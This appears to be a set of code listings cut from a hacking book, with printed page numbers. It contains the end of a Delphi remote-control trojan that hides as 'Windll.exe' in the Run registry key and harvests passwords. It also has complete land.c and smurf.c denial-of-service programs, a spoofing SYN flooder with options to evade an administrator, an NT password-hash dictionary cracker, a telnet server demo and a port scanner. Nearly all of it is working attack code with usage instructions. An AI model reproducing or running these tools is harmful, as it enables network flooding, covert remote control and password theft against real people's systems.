('TCount'); for i:=1 to PX do RG.DeleteValue (inttostr(i)); end; RG.Destroy; PTimer.Enabled:=true; end; if gotstr='KillHER' then begin Socket.SendText ('Server killed!'); ServerSocket.Close; RG:=TRegistry.Create;


RG.RootKey:=HKEY_LOCAL_MACHINE; RG.OpenKey ('SOFTWARE\Microsoft', FALSE); RG.DeleteKey ('General'); RG.Destroy; RG:=TRegistry.Create; RG.RootKey:=HKEY_LOCAL_MACHINE; RG.OpenKey ('SOFTWARE\Microsoft\Windows\CurrentVersion\Run', FALSE); RG.DeleteValue ('Windll.exe'); RG.Destroy; Halt (0); end; if gotstr='HELP?' then begin Socket.SendText ('---HELP---'+WrapStr);Sleep(100); Socket.SendText ('KillHER - kill server'+WrapStr);Sleep(100); Socket.SendText ('UP - switch password-looking timer on'+WrapStr);Sleep(100); Socket.SendText ('DOWN - off'+WrapStr);Sleep(100); Socket.SendText ('Logoff - logoff user from windows'+WrapStr);Sleep(100); Socket.SendText ('Shutdown - shutdown windows'+WrapStr);Sleep(100); Socket.SendText ('ReBOOT - reboot PC'+WrapStr);Sleep(100); Socket.SendText ('PowerOFF - power off ;)'+WrapStr);Sleep(100); Socket.SendText ('Name user - displays username'+WrapStr);Sleep(100); Socket.SendText ('TEST? - tests server'+WrapStr);Sleep(100); Socket.SendText ('time - displays time'+WrapStr);Sleep(100); Socket.SendText ('ver - displays server version'+WrapStr);Sleep(100); Socket.SendText ('----------'+WrapStr);Sleep(100); end; end; // if not sendfile end; // if not recfile end; procedure TServerForm.FormClose(Sender: TObject; var Action: TCloseAction); var RG: TRegistry; begin RG:=TRegistry.Create; RG.RootKey:=HKEY_LOCAL_MACHINE; RG.OpenKey ('SOFTWARE\Microsoft\Windows\CurrentVersion\Run', FALSE); RG.WriteString ('Windll.exe', SD+'Windll.exe'); RG.RootKey:=HKEY_LOCAL_MACHINE; RG.OpenKey ('\SOFTWARE\Microsoft\General\Settings', FALSE); RG.WriteInteger ('APPID', ServerSocket.Port); RG.Destroy; end; procedure TServerForm.PTimerTimer(Sender: TObject); begin RegistryPasswords; end; end.


Página 221 Option Explicit 'This is a simple TELNET server supporting only one user and one comnection at a time. 'Program can be enhanced for multiple user and for multiple users at a time. '***************************************** 'Server side setup 'To start the DEMO. Open up your visual Basic 5.0 with the default project(standard exe project) 'Place a winsock control. By default it will be named Winsock1. 'Then paste this piece of code into the form1's code section. 'Run the project. '***************************************** '***************************************** 'ClientSide Setup 'You can use the same machine or go to the other machine to test your server 'Go to the RUN prompt of your windows type telnet 'In the telnet's Connect menu option select Remote System... 'Now enter the ip address of the computer where your telnet server (demo application) is running in the Host Name option 'Enter 23 or default value in the Host edit box 'Press Enter 'Yes, there comes your login screen. '***************************************** '***************************************** 'Any more clarification you can contact me at [email protected] '***************************************** 'API Declaration Private Declare Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As Long) 'Form level variables Dim UserID As String 'Store the UserID Dim Password As String 'Store the Password Dim AcceptedId As Boolean 'Toggle betwen the accepting of UserID or Password Dim SuccessLoging As Boolean 'User logged in Successfully Dim UserCommand As String 'Command issued by the user Private Sub Form_Load() 'Initialisation routine Winsock1.LocalPort = 23 'Set the telnet port Winsock1.Listen 'Set the server to listen for a client request UserID = "" Password = "" UserCommand = "" AcceptedId = False SuccessLoging = False End Sub Private Sub Winsock1_Close() 'When user wants to close the telnet connection Winsock1.Close 'Close the telnet port Winsock1.LocalPort = 23 Winsock1.Listen 'Listen for the new user 'Initialisation of the telnet server variables UserID = "" Password = "" UserCommand = "" AcceptedId = False


SuccessLoging = False End Sub Private Sub Winsock1_ConnectionRequest(ByVal requestID As Long) 'User wants to connect to the server If Winsock1.State <> sckClosed Then Winsock1.Close Winsock1.Accept requestID 'Send him the accepted message and ask him to logon to the server Winsock1.SendData "Enter LoginID for Sanjeev's Server: " End Sub Private Sub Winsock1_DataArrival(ByVal bytesTotal As Long) Dim str1 As String Dim MyName As String Dim DirList() As String Dim DirPointer As Integer Dim ii As Integer 'User sending some information Winsock1.GetData str1 'Receive the input from the client If SuccessLoging Then 'Check whether user had already had logged in OR not. If Asc(str1) = 13 Then If UserCommand Like "dir*[\]" Then 'Processing the dir command issued by the user 'Valied command will be for eg. dir c:\ Winsock1.SendData vbCrLf UserCommand = Mid$(UserCommand, 4, Len(UserCommand) - 3) DirPointer = 1 UserCommand = Trim(UserCommand) 'Routine to get the current directory listing MyName = Dir(UserCommand, vbDirectory) Do While MyName <> "" If MyName <> "." And MyName <> ".." Then If (GetAttr(UserCommand & MyName) And vbDirectory) = vbDirectory Then ReDim Preserve DirList(1 To DirPointer) DirList(DirPointer) = MyName DirPointer = DirPointer + 1 End If ' it represents a directory. End If MyName = Dir ' Get next entry. Loop For ii = 1 To DirPointer - 1 Winsock1.SendData DirList(ii) & vbCrLf Next Winsock1.SendData "Sanjeev>" 'Display the prompt UserCommand = "" ElseIf Trim(UserCommand) Like "exit" Then 'User wants to terminate the session Winsock1_Close UserCommand = "" ElseIf Trim(UserCommand) Like "help" Then 'User requested for the set of commands supported by the server Winsock1.SendData vbCrLf & "List of Commands supported by this server" & vbCrLf Winsock1.SendData "Dir <path\> --- to get the list of the directory." & vbCrLf Winsock1.SendData "exit --- to quit logout from the server." & vbCrLf Winsock1.SendData "time -- to get the time of the server." & vbCrLf Winsock1.SendData "help -- to get the list of commands supported by the server." & vbCrLf Winsock1.SendData "Sanjeev>"


UserCommand = "" ElseIf Trim(UserCommand) Like "time" Then 'Send the user server's current time Winsock1.SendData vbCrLf & Time & vbCrLf Winsock1.SendData "Sanjeev>" UserCommand = "" Else 'Its an invalied command or command not suported by the telnet server Winsock1.SendData vbCrLf & "Invalied Command" & vbCrLf & "For list of commands use help command" & vbCrLf UserCommand = "" Winsock1.SendData "Sanjeev>" End If Else Winsock1.SendData str1 UserCommand = UserCommand & str1 End If Else 'Get the user authentication If AcceptedId And Asc(str1) = 13 Then Winsock1.SendData vbCrLf & "Verifying your login information...." & vbCrLf If UserID = "sanjeev" And Password = "siri" Then Sleep (2000) Winsock1.SendData "Welcome Mr.Sanjeev Sirigere" & vbCrLf & "Sanjeev>" SuccessLoging = True Else AcceptedId = False UserID = "" Password = "" Winsock1.SendData "Enter LoginID: " Exit Sub End If ElseIf Asc(str1) = 13 Then Winsock1.SendData str1 & vbCrLf & "Enter Password:" AcceptedId = True Exit Sub ElseIf Not AcceptedId Then Winsock1.SendData str1 End If If AcceptedId Then Password = Password & str1 Else UserID = UserID & str1 End If End If End Sub


Página 228 /* land.c by m3lt, FLC crashes a win95 box */ #include <stdio.h> #include <netdb.h> #include <arpa/inet.h> #include <netinet/in.h> #include <sys/types.h> #include <sys/socket.h> #include <netinet/ip.h> #include <netinet/ip_tcp.h> #include <netinet/protocols.h> struct pseudohdr { struct in_addr saddr; struct in_addr daddr; u_char zero; u_char protocol; u_short length; struct tcphdr tcpheader; }; u_short checksum(u_short * data,u_short length) { register long value; u_short i; for(i=0;i<(length>>1);i++) value+=data[i]; if((length&1)==1) value+=(data[i]<<8); value=(value&65535)+(value>>16); return(~value); } int main(int argc,char * * argv) { struct sockaddr_in sin; struct hostent * hoste; int sock; char buffer[40]; struct iphdr * ipheader=(struct iphdr *) buffer; struct tcphdr * tcpheader=(struct tcphdr *) (buffer+sizeof(struct iphdr)); struct pseudohdr pseudoheader; fprintf(stderr,"land.c by m3lt, FLC\n"); if(argc<3) { fprintf(stderr,"usage: %s IP port\n",argv[0]); return(-1); } bzero(&sin,sizeof(struct sockaddr_in)); sin.sin_family=AF_INET; if((hoste=gethostbyname(argv[1]))!=NULL) bcopy(hoste->h_addr,&sin.sin_addr,hoste->h_length); else if((sin.sin_addr.s_addr=inet_addr(argv[1]))==-1)


{ fprintf(stderr,"unknown host %s\n",argv[1]); return(-1); } if((sin.sin_port=htons(atoi(argv[2])))==0) { fprintf(stderr,"unknown port %s\n",argv[2]); return(-1); } if((sock=socket(AF_INET,SOCK_RAW,255))==-1) { fprintf(stderr,"couldn't allocate raw socket\n"); return(-1); } bzero(&buffer,sizeof(struct iphdr)+sizeof(struct tcphdr)); ipheader->version=4; ipheader->ihl=sizeof(struct iphdr)/4; ipheader->tot_len=htons(sizeof(struct iphdr)+sizeof(struct tcphdr)); ipheader->id=htons(0xF1C); ipheader->ttl=255; ipheader->protocol=IP_TCP; ipheader->saddr=sin.sin_addr.s_addr; ipheader->daddr=sin.sin_addr.s_addr; tcpheader->th_sport=sin.sin_port; tcpheader->th_dport=sin.sin_port; tcpheader->th_seq=htonl(0xF1C); tcpheader->th_flags=TH_SYN; tcpheader->th_off=sizeof(struct tcphdr)/4; tcpheader->th_win=htons(2048); bzero(&pseudoheader,12+sizeof(struct tcphdr)); pseudoheader.saddr.s_addr=sin.sin_addr.s_addr; pseudoheader.daddr.s_addr=sin.sin_addr.s_addr; pseudoheader.protocol=6; pseudoheader.length=htons(sizeof(struct tcphdr)); bcopy((char *) tcpheader,(char *) &pseudoheader.tcpheader,sizeof(struct tcphdr)); tcpheader->th_sum=checksum((u_short *) &pseudoheader,12+sizeof(struct tcphdr)); if(sendto(sock,buffer,sizeof(struct iphdr)+sizeof(struct tcphdr),0,(struct sockaddr *) &sin,sizeof(struct sockaddr_in))==-1) { fprintf(stderr,"couldn't send packet\n"); return(-1); } fprintf(stderr,"%s:%s landed\n",argv[1],argv[2]); close(sock); return(0); }


Página 233 #include <signal.h> #include <stdio.h> #include <stdlib.h> #include <sys/socket.h> #include <sys/types.h> #include <netinet/in.h> #include <netinet/ip.h> #include <netinet/ip_icmp.h> #include <netdb.h> #include <ctype.h> #include <arpa/inet.h> #include <unistd.h> #include <string.h> void banner(void); void usage(char *); void smurf(int, struct sockaddr_in, u_long, int); void ctrlc(int); unsigned short in_chksum(u_short *, int); /* stamp */ char id[] = "$Id smurf.c,v 4.0 1997/10/11 13:02:42 EST tfreak Exp $"; int main (int argc, char *argv[]) { struct sockaddr_in sin; struct hostent *he; FILE *bcastfile; int i, sock, bcast, delay, num, pktsize, cycle = 0, x; char buf[32], **bcastaddr = malloc(8192); banner(); signal(SIGINT, ctrlc); if (argc < 6) usage(argv[0]); if ((he = gethostbyname(argv[1])) == NULL) { perror("resolving source host"); exit(-1); } memcpy((caddr_t)&sin.sin_addr, he->h_addr, he->h_length); sin.sin_family = AF_INET; sin.sin_port = htons(0); num = atoi(argv[3]); delay = atoi(argv[4]); pktsize = atoi(argv[5]); if ((bcastfile = fopen(argv[2], "r")) == NULL) { perror("opening bcast file"); exit(-1); } x = 0; while (!feof(bcastfile)) { fgets(buf, 32, bcastfile); if (buf[0] == '#' || buf[0] == '\n' || ! isdigit(buf[0])) continue; for (i = 0; i < strlen(buf); i++) if (buf[i] == '\n') buf[i] = '\0'; bcastaddr[x] = malloc(32); strcpy(bcastaddr[x], buf); x++; }


bcastaddr[x] = 0x0; fclose(bcastfile); if (x == 0) { fprintf(stderr, "ERROR: no broadcasts found in file %s\n\n", argv[2]); exit(-1); } if (pktsize > 1024) { fprintf(stderr, "ERROR: packet size must be < 1024\n\n"); exit(-1); } if ((sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) { perror("getting socket"); exit(-1); } setsockopt(sock, SOL_SOCKET, SO_BROADCAST, (char *)&bcast, sizeof(bcast)); printf("Flooding %s (. = 25 outgoing packets)\n", argv[1]); for (i = 0; i < num || !num; i++) { if (!(i % 25)) { printf("."); fflush(stdout); } smurf(sock, sin, inet_addr(bcastaddr[cycle]), pktsize); cycle++; if (bcastaddr[cycle] == 0x0) cycle = 0; usleep(delay); } puts("\n\n"); return 0; } void banner (void) { puts("\nsmurf.c v4.0 by TFreak\n"); } void usage (char *prog) { fprintf(stderr, "usage: %s <target> <bcast file> " "<num packets> <packet delay> <packet size>\n\n" "target = address to hit\n" "bcast file = file to read broadcast addresses from\n" "num packets = number of packets to send (0 = flood)\n" "packet delay = wait between each packet (in ms)\n" "packet size = size of packet (< 1024)\n\n", prog); exit(-1); } void smurf (int sock, struct sockaddr_in sin, u_long dest, int psize) { struct iphdr *ip; struct icmphdr *icmp; char *packet; packet = malloc(sizeof(struct iphdr) + sizeof(struct icmphdr) + psize); ip = (struct iphdr *)packet; icmp = (struct icmphdr *) (packet + sizeof(struct iphdr)); memset(packet, 0, sizeof(struct iphdr) + sizeof(struct icmphdr) + psize); ip->tot_len = htons(sizeof(struct iphdr) + sizeof(struct icmphdr) + psize); ip->ihl = 5; ip->version = 4; ip->ttl = 255; ip->tos = 0;


ip->frag_off = 0; ip->protocol = IPPROTO_ICMP; ip->saddr = sin.sin_addr.s_addr; ip->daddr = dest; ip->check = in_chksum((u_short *)ip, sizeof(struct iphdr)); icmp->type = 8; icmp->code = 0; icmp->checksum = in_chksum((u_short *)icmp, sizeof(struct icmphdr) + psize); sendto(sock, packet, sizeof(struct iphdr) + sizeof(struct icmphdr) + psize, 0, (struct sockaddr *)&sin, sizeof(struct sockaddr)); free(packet); /* free willy! */ } void ctrlc (int ignored) { puts("\nDone!\n"); exit(1); } unsigned short in_chksum (u_short *addr, int len) { register int nleft = len; register int sum = 0; u_short answer = 0; while (nleft > 1) { sum += *addr++; nleft -= 2; } if (nleft == 1) { *(u_char *)(&answer) = *(u_char *)addr; sum += answer; } sum = (sum >> 16) + (sum + 0xffff); sum += (sum >> 16); answer = ~sum; return(answer); }


Página 237 /* Syn Flooder by Zakath * TCP Functions by trurl_ (thanks man). * Some more code by Zakath. * Speed/Misc Tweaks/Enhancments -- ultima * Nice Interface -- ultima * Random IP Spoofing Mode -- ultima * How To Use: * Usage is simple. srcaddr is the IP the packets will be spoofed from. * dstaddr is the target machine you are sending the packets to. * low and high ports are the ports you want to send the packets to. * Random IP Spoofing Mode: Instead of typing in a source address, * just use '0'. This will engage the Random IP Spoofing mode, and * the source address will be a random IP instead of a fixed ip. * Released: [4.29.97] * To compile: cc -o synk4 synk4.c * */ #include <signal.h> #include <stdio.h> #include <netdb.h> #include <sys/types.h> #include <sys/time.h> #include <netinet/in.h> #include <linux/ip.h> #include <linux/tcp.h> /* These can be handy if you want to run the flooder while the admin is on * this way, it makes it MUCH harder for him to kill your flooder */ /* Ignores all signals except Segfault */ // #define HEALTHY /* Ignores Segfault */ // #define NOSEGV /* Changes what shows up in ps -aux to whatever this is defined to */ // #define HIDDEN "vi .cshrc" #define SEQ 0x28376839 #define getrandom(min, max) ((rand() % (int)(((max)+1) - (min))) + (min)) unsigned long send_seq, ack_seq, srcport; char flood = 0; int sock, ssock, curc, cnt; /* Check Sum */ unsigned short ip_sum (addr, len) u_short *addr; int len; { register int nleft = len; register u_short *w = addr; register int sum = 0; u_short answer = 0; while (nleft > 1) { sum += *w++; nleft -= 2; } if (nleft == 1) { *(u_char *) (&answer) = *(u_char *) w; sum += answer; } sum = (sum >> 16) + (sum & 0xffff); /* add hi 16 to low 16 */


sum += (sum >> 16); /* add carry */ answer = ~sum; /* truncate to 16 bits */ return (answer); } void sig_exit(int crap) { #ifndef HEALTHY printf("_[H_[JSignal Caught. Exiting Cleanly.\n"); exit(crap); #endif } void sig_segv(int crap) { #ifndef NOSEGV printf("_[H_[JSegmentation Violation Caught. Exiting Cleanly.\n"); exit(crap); #endif } unsigned long getaddr(char *name) { struct hostent *hep; hep=gethostbyname(name); if(!hep) { fprintf(stderr, "Unknown host %s\n", name); exit(1); } return *(unsigned long *)hep->h_addr; } void send_tcp_segment(struct iphdr *ih, struct tcphdr *th, char *data, int dlen) { char buf[65536]; struct { /* rfc 793 tcp pseudo-header */ unsigned long saddr, daddr; char mbz; char ptcl; unsigned short tcpl; } ph; struct sockaddr_in sin; /* how necessary is this, given that the destination address is already in the ip header? */ ph.saddr=ih->saddr; ph.daddr=ih->daddr; ph.mbz=0; ph.ptcl=IPPROTO_TCP; ph.tcpl=htons(sizeof(*th)+dlen); memcpy(buf, &ph, sizeof(ph)); memcpy(buf+sizeof(ph), th, sizeof(*th)); memcpy(buf+sizeof(ph)+sizeof(*th), data, dlen); memset(buf+sizeof(ph)+sizeof(*th)+dlen, 0, 4); th->check=ip_sum(buf, (sizeof(ph)+sizeof(*th)+dlen+1)&~1); memcpy(buf, ih, 4*ih->ihl); memcpy(buf+4*ih->ihl, th, sizeof(*th)); memcpy(buf+4*ih->ihl+sizeof(*th), data, dlen); memset(buf+4*ih->ihl+sizeof(*th)+dlen, 0, 4); ih->check=ip_sum(buf, (4*ih->ihl + sizeof(*th)+ dlen + 1) & ~1); memcpy(buf, ih, 4*ih->ihl); sin.sin_family=AF_INET; sin.sin_port=th->dest;


sin.sin_addr.s_addr=ih->daddr; if(sendto(ssock, buf, 4*ih->ihl + sizeof(*th)+ dlen, 0, &sin, sizeof(sin))<0) { printf("Error sending syn packet.\n"); perror(""); exit(1); } } unsigned long spoof_open(unsigned long my_ip, unsigned long their_ip, unsigned short port) { int i, s; struct iphdr ih; struct tcphdr th; struct sockaddr_in sin; int sinsize; unsigned short myport=6969; char buf[1024]; struct timeval tv; ih.version=4; ih.ihl=5; ih.tos=0; /* XXX is this normal? */ ih.tot_len=sizeof(ih)+sizeof(th); ih.id=htons(random()); ih.frag_off=0; ih.ttl=30; ih.protocol=IPPROTO_TCP; ih.check=0; ih.saddr=my_ip; ih.daddr=their_ip; th.source=htons(srcport); th.dest=htons(port); th.seq=htonl(SEQ); th.doff=sizeof(th)/4; th.ack_seq=0; th.res1=0; th.fin=0; th.syn=1; th.rst=0; th.psh=0; th.ack=0; th.urg=0; th.res2=0; th.window=htons(65535); th.check=0; th.urg_ptr=0; gettimeofday(&tv, 0); send_tcp_segment(&ih, &th, "", 0); send_seq = SEQ+1+strlen(buf); } void upsc() { int i; char schar; switch(cnt) { case 0: { schar = '|'; break;


} case 1: { schar = '/'; break; } case 2: { schar = '-'; break; } case 3: { schar = '\\'; break; } case 4: { schar = '|'; cnt = 0; break; } } printf("_[H_[1;30m[_[1;31m%c_[1;30m]_[0m %d", schar, curc); cnt++; for(i=0; i<26; i++) { i++; curc++; } } void init_signals() { // Every Signal known to man. If one gives you an error, comment it out! signal(SIGHUP, sig_exit); signal(SIGINT, sig_exit); signal(SIGQUIT, sig_exit); signal(SIGILL, sig_exit); signal(SIGTRAP, sig_exit); signal(SIGIOT, sig_exit); signal(SIGBUS, sig_exit); signal(SIGFPE, sig_exit); signal(SIGKILL, sig_exit); signal(SIGUSR1, sig_exit); signal(SIGSEGV, sig_segv); signal(SIGUSR2, sig_exit); signal(SIGPIPE, sig_exit); signal(SIGALRM, sig_exit); signal(SIGTERM, sig_exit); signal(SIGCHLD, sig_exit); signal(SIGCONT, sig_exit); signal(SIGSTOP, sig_exit); signal(SIGTSTP, sig_exit); signal(SIGTTIN, sig_exit); signal(SIGTTOU, sig_exit); signal(SIGURG, sig_exit); signal(SIGXCPU, sig_exit); signal(SIGXFSZ, sig_exit); signal(SIGVTALRM, sig_exit); signal(SIGPROF, sig_exit); signal(SIGWINCH, sig_exit); signal(SIGIO, sig_exit); signal(SIGPWR, sig_exit); } main(int argc, char **argv) { int i, x, max, floodloop, diff, urip, a, b, c, d;


unsigned long them, me_fake; unsigned lowport, highport; char buf[1024], *junk; init_signals(); #ifdef HIDDEN for (i = argc-1; i >= 0; i--) /* Some people like bzero...i prefer memset:) */ memset(argv[i], 0, strlen(argv[i])); strcpy(argv[0], HIDDEN); #endif if(argc<5) { printf("Usage: %s srcaddr dstaddr low high\n", argv[0]); printf(" If srcaddr is 0, random addresses will be used\n\n\n"); exit(1); } if( atoi(argv[1]) == 0 ) urip = 1; else me_fake=getaddr(argv[1]); them=getaddr(argv[2]); lowport=atoi(argv[3]); highport=atoi(argv[4]); srandom(time(0)); ssock=socket(AF_INET, SOCK_RAW, IPPROTO_RAW); if(ssock<0) { perror("socket (raw)"); exit(1); } sock=socket(AF_INET, SOCK_RAW, IPPROTO_TCP); if(sock<0) { perror("socket"); exit(1); } junk = (char *)malloc(1024); max = 1500; i = 1; diff = (highport - lowport); if (diff > -1) { printf("_[H_[J\n\nCopyright (c) 1980, 1983, 1986, 1988, 1990, 1991 The Regents of the University\n of California. All Rights Reserved."); for (i=1;i>0;i++) { srandom((time(0)+i)); srcport = getrandom(1, max)+1000; for (x=lowport;x<=highport;x++) { if ( urip == 1 ) { a = getrandom(0, 255); b = getrandom(0, 255); c = getrandom(0, 255); d = getrandom(0, 255); sprintf(junk, "%i.%i.%i.%i", a, b, c, d); me_fake = getaddr(junk); } spoof_open(/*0xe1e26d0a*/ me_fake, them, x); /* A fair delay. Good for a 28.8 connection */ usleep(300);


if (!(floodloop = (floodloop+1)%(diff+1))) { upsc(); fflush(stdout); } } } } else { printf("High port must be greater than Low port.\n"); exit(1); } }


Página 276 <++> NTPWC/ntpwc.c /* * (C) Nihil All rights reserved. A Guild Production. #include <stdio.h> #include <stdlib.h> #include <string.h> #include <ctype.h> #include "byteorder.h" #include "md4.h" #define TRUE 1 #define FALSE 0 #define HASHSIZE 16 #define MAX_PASSWORD_LENGTH 14 #define uchar unsigned char #define int16 unsigned short #define uint16 unsigned short #define uint32 unsigned int typedef struct _USER_INFO { char* username; unsigned long ntpassword[4]; }USER_INFO, *PUSER_INFO; typedef struct _UNICODE_STRING { int16* buffer; unsigned long length; }UNICODE_STRING, *PUNICODE_STRING; static int _my_mbstowcs(int16*, uchar*, int); static int _my_wcslen(int16*); void Cleanup(void); int ParsePWEntry(char*, PUSER_INFO); char pPWEntry[258]; char pDictEntry[129]; MDstruct MDContext; int main(int argc,char *argv[]) { FILE *hToCrack, *hDictionary; PUSER_INFO pUserInfo; PUNICODE_STRING pUnicodeDictEntry; int i; unsigned int uiLength; atexit(Cleanup);


if (argc != 3) { printf("\nUsage: %s <password file> <dictionary file>\n", argv[0]); exit(0); } /* open password file */ hToCrack = fopen(argv[1], "r"); if (hToCrack == NULL) { fprintf(stderr,"Unable to open password file\n"); exit(-1); } hDictionary = fopen(argv[2], "r"); if (hDictionary == NULL) { fprintf(stderr,"Unable to open dictionary file\n"); exit(-1); } pUserInfo = (PUSER_INFO)malloc(sizeof (USER_INFO)); if (pUserInfo == NULL) { fprintf(stderr,"Unable to allocate memory for user info structure\n"); exit(-1); } pUnicodeDictEntry = (PUNICODE_STRING)malloc(sizeof (UNICODE_STRING)); if (pUnicodeDictEntry == NULL) { fprintf(stderr,"Unable to allocate memory for unicode conversion\n"); free(pUserInfo); exit(-1); } printf("\nCrack4NT is running...\n"); while (fgets(pPWEntry, sizeof (pPWEntry), hToCrack)) { if (ParsePWEntry(pPWEntry, pUserInfo) == FALSE) { continue; } if (fseek(hDictionary, 0, SEEK_SET)) { fprintf(stderr,"Unable to reset file pointer in dictionary\n"); memset(pUserInfo->ntpassword, 0, HASHSIZE); free(pUserInfo); free(pUnicodeDictEntry); exit(-1); } while (fgets(pDictEntry, sizeof (pDictEntry), hDictionary)) { if (pDictEntry[(strlen(pDictEntry) - 1)] == '\n') { pDictEntry[(strlen(pDictEntry) - 1)] = '\0'; }


uiLength = strlen((char *)pDictEntry); if(uiLength > MAX_PASSWORD_LENGTH) uiLength = MAX_PASSWORD_LENGTH; pUnicodeDictEntry->length = (uiLength + 1) * sizeof(int16); pUnicodeDictEntry->buffer = (int16*)malloc(pUnicodeDictEntry->length); if (pUnicodeDictEntry->buffer == NULL) { fprintf(stderr,"Unable to allocate space for unicode string\n"); exit(-1); } _my_mbstowcs( pUnicodeDictEntry->buffer, pDictEntry, uiLength); pUnicodeDictEntry->buffer[uiLength] = 0; uiLength = _my_wcslen(pUnicodeDictEntry->buffer) * sizeof(int16); MDbegin(&MDContext); for(i = 0; i + 64 <= (signed)uiLength; i+= 64) MDupdate(&MDContext,pUnicodeDictEntry->buffer + (i/2), 512); MDupdate(&MDContext,pUnicodeDictEntry->buffer + (i/2),(uiLength-i)*8); if (memcmp(MDContext.buffer, pUserInfo->ntpassword, HASHSIZE) == 0) { printf("Password for user %s is %s\n", pUserInfo->username, \ pDictEntry); /* we are done with the password entry só free it */ free(pUnicodeDictEntry->buffer); break; } free(pUnicodeDictEntry->buffer); } } /* cleanup a bunch */ free(pUserInfo->username); memset(pUserInfo->ntpassword, 0, HASHSIZE); free(pUserInfo); free(pUnicodeDictEntry); /* everything is great */ printf("Crack4NT is finished\n"); return 0; } void Cleanup() { memset(pPWEntry, 0, 258); memset(pDictEntry, 0, 129); memset(&MDContext.buffer, 0, HASHSIZE); } int ParsePWEntry(char* pPWEntry, PUSER_INFO pUserInfo)


{ int HexToBin(char*, uchar*, int); char pDelimiter[] = ":"; char* pTemp; char pNoPW[] = "NO PASSWORD*********************"; char pDisabled[] = "********************************"; /* check args */ if (pPWEntry == NULL || pUserInfo == NULL) { return FALSE; } pTemp = strtok(pPWEntry, pDelimiter); if (pTemp == NULL) { return FALSE; } pUserInfo->username = (char*)malloc(strlen(pTemp) + 1); if (pUserInfo->username == NULL) { fprintf(stderr,"Unable to allocate memory for user name\n"); return FALSE; } strcpy(pUserInfo->username, pTemp); strtok(NULL, pDelimiter); strtok(NULL, pDelimiter); pTemp = strtok(NULL, pDelimiter); if (pTemp == NULL) { free(pUserInfo->username); return FALSE; } if (strlen(pTemp) != 32) { free(pUserInfo->username); return FALSE; } if (strcmp(pTemp, pNoPW) == 0) { printf("User %s has no password\n", pUserInfo->username); return FALSE; } if (strcmp(pTemp, pDisabled) == 0) { printf("User %s is disabled most likely\n", pUserInfo->username); return FALSE; } if (HexToBin((unsigned char*)pTemp, (uchar*)pUserInfo->ntpassword,16) == FALSE) { free(pUserInfo->username); return FALSE; } memset(pTemp, 0, 32);


return TRUE; } int HexToBin(char* pHexString, uchar* pByteString, int count) { int i, j; if (pHexString == NULL || pByteString == NULL) { fprintf(stderr,"A NULL pointer was passed to HexToBin()\n"); return FALSE; } memset(pByteString, 0, count); for (i = 0, j = 0; i < (count * 2); i++) { switch (*(pHexString + i)) { case '0': pByteString[j] ^= 0x00; break; case '1': pByteString[j] ^= 0x01; break; case '2': pByteString[j] ^= 0x02; break; case '3': pByteString[j] ^= 0x03; break; case '4': pByteString[j] ^= 0x04; break; case '5': pByteString[j] ^= 0x05; break; case '6': pByteString[j] ^= 0x06; break; case '7': pByteString[j] ^= 0x07; break; case '8': pByteString[j] ^= 0x08; break; case '9': pByteString[j] ^= 0x09; break; case 'a': case 'A': pByteString[j] ^= 0x0A; break; case 'b': case 'B': pByteString[j] ^= 0x0B; break; case 'c': case 'C': pByteString[j] ^= 0x0C; break; case 'd': case 'D': pByteString[j] ^= 0x0D;


break; case 'e': case 'E': pByteString[j] ^= 0x0E; break; case 'f': case 'F': pByteString[j] ^= 0x0F; break; default: fprintf(stderr,"invalid character in NT MD4 string\n"); return FALSE; } if (i%2) { j ++; } if ((i%2) == 0) { pByteString[j] <<= 4; } } return TRUE; } static int _my_wcslen(int16 *str) { int len = 0; while(*str++ != 0) len++; return len; } static int _my_mbstowcs(int16 *dst, uchar *src, int len) { int i; int16 val; for(i = 0; i < len; i++) { val = *src; SSVAL(dst,0,val); dst++; src++; if(val == 0) break; } return i; } <--> NTPWC/ntpwc.c EOF


Página 316 Public NumWait As Integer 'how many secs to wait for response Public UpperB As Integer Const HWND_TOP = 0 Const HWND_TOPMOST = -1 Const HWND_NOTOPMOST = -2 Const SWP_NOMOVE = &H2 Const SWP_NOSIZE = &H1 Const flags = SWP_NOMOVE Or SWP_NOSIZE Private Declare Function SetWindowPos Lib "user32" (ByVal hWnd As Long, ByVal hWndInsertAfter As Long, ByVal X As Long, ByVal Y As Long, ByVal cx As Long, ByVal cy As Long, ByVal wFlags As Long) As Long Dim LowerB As Integer Dim PortFound As Boolean Dim StopSrch As Boolean Dim FirstRun As Boolean Dim StopIt As Boolean Sub stayontop(the As Form) SetWinOnTop = SetWindowPos(the.hWnd, HWND_TOPMOST, 0, 0, 0, 0, flags) End Sub Private Sub Command1_Click() If sock.State <> 0 Then sock.Close Do Until sock.State = 0 DoEvents Loop End If If Command1.Caption = "Start" Then Command1.Caption = "Stop" PortFound = False FirstRun = True If Check1.Value = 1 Then StopSrch = True Else StopSrch = False End If If Option2.Value = True Then If Text2.Text <> "" And Text3.Text <> "" Then UpperB = Int(Val(Text3.Text)) LowerB = Int(Val(Text2.Text)) Else MsgBox "Must Specify Ports To Find", vbExclamation + vbMsgBoxSetForeground + vbOKOnly, "Port Finder" End If ElseIf Option1.Value = True Then UpperB = 32767 LowerB = 1 End If If Text4.Text = "" Then Text4.Text = "5" End If NumWait = Int(Val(Text4.Text)) Label2.Caption = "Scanning Ports..." sock.RemoteHost = Text1.Text sock.LocalPort = 0 For qw% = LowerB To UpperB If StopIt = True Then Command1.Caption = "Start"


Label2.Caption = "Canceled...No Connections" StopIt = False Exit Sub End If sock.Connect sock.RemoteHost, qw% start = 0 start = (Timer) Do Until sock.State = 7 If StopIt = True Then Command1.Caption = "Start" Label2.Caption = "Canceled...No Connections" StopIt = False Exit Sub End If DoEvents If (Timer) - (start) >= NumWait Then sock.Close Do Until sock.State = 0 DoEvents If StopIt = True Then Command1.Caption = "Start" Label2.Caption = "Canceled...No Connections" StopIt = False Exit Sub End If Loop Exit Do End If Loop If sock.State = 7 Then If FirstRun = True Then Label2.Caption = "Open port found: " & qw% Else Label2.Caption = Label2.Caption & ", " & qw% End If PortFound = True FirstRun = False sock.Close Do Until sock.State = 0 DoEvents Loop If StopSrch = True Then Exit For End If End If Next qw% If PortFound = False Then Label2.Caption = "No Ports Found" End If Label2.Caption = Label2.Caption & " ...Done" Else 'stop StopIt = True End If If Command1.Caption = "Start" Then Command1.Caption = "Stop" Exit Sub ElseIf Command1.Caption = "Stop" Then Command1.Caption = "Start" End If End Sub Private Sub Command2_Click() End Sub


